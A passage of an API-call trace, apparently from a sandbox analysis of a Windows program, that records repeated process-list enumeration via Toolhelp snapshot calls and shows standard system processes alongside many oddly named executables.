th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0106.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.769] CloseHandle (hObject=0xc4) returned 1 [0106.769] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.774] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0106.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.780] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.785] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.796] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.797] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.798] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.799] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0106.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0106.880] CloseHandle (hObject=0xbc) returned 1 [0106.880] Sleep (dwMilliseconds=0x12c) [0107.203] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.210] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.213] Process32NextW 